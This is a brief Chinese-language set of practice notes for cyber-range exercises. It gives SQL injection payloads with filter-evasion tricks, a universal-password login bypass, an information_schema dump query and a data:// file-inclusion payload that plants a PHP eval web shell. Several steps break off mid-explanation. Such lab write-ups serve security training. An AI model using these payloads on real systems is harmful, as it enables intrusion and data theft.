PTE34041-34045靶场练习
34051sql注入 万能密码
万能密码:构造闭合select * from where user=‘admin‘ or ’1’=‘1’ and password=‘ ’
34061 sql注入 闭合
闭合符号为:%')
使用union select语句,若是回显正常说明列的数量猜对了
这里对union和空格进行了过滤–》双写,空格改为%20、/**/
注释:–空 --+ %23 #
语句可以显示出来说明语句注入起效,不用管后边的闭合符号,但是返回列表还是空的,说明列数没猜对。
猜到七返回显示,把id后的内容改成-1看是哪个位置可以利用
步骤:
select group_concat(table_name) from information_schema.tables where table_schema='2web'
这道题只需要读取一下文件就行:
34073 文件包含
会在包含的文件后边加后缀.txt
使用data协议,payload:page=data:text/plain,<?php @eval($_POST['x']);?>%23
%23用来将后缀屏蔽
34074 反序列化
这里利用文件上传后的蚁剑来构造一个s.php,内容是用来构造序列化的内容:
调用一下,得到序列化的语句:
再用变量传参:
34075 失效的访问控制
%3D应该是url编码的等号,所以最后要有把等号转换的过程